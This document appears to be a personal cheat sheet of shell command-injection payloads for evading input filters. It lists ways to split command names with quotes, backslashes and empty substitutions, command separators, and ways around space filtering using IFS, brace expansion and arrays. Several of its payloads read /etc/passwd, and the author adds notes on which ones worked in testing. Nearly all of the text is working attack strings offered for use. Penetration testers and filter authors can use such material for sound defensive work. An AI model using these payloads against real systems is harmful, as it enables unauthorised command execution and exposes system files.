Filter bypasses

Various ways to bbypass filters looking for particular strings in input being fed to a shell

$() - null statement can be inserted into the middle of commands e.g. i$()d to bypass filters 
also i''d and i""d
who'a'mi
l``s
who${}ami
who$(:)ami
whoa\mi
&& || | ;
`` $()

Space bypasses

Ways to bypass filters that wont allows spaces

Works on bash for space, not on zsh:

cat${IFS}/etc/passwd
ls${IFS%??}-lart
{ls,-lart}
ls$IFS-lart
ls${IFS:0:1}-lart
L=ls;B=-lart;{$L,$B}
L=ls;B=-lart;{${L},${B}}
L=ls;B=-lart;${L}${IFS:0:1}${B}

This works on both zsh and bash

A[1]=ls;A[2]=-lart;${A[*]}

A[1]=cat;A[2]=/etc/passwd;${A[*]}
A[1]=cat;A[2]=/etc/passwd;${A[@]}

Claimed to work but didnt in my testing

CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20/etc/passwd'&&cat$CMD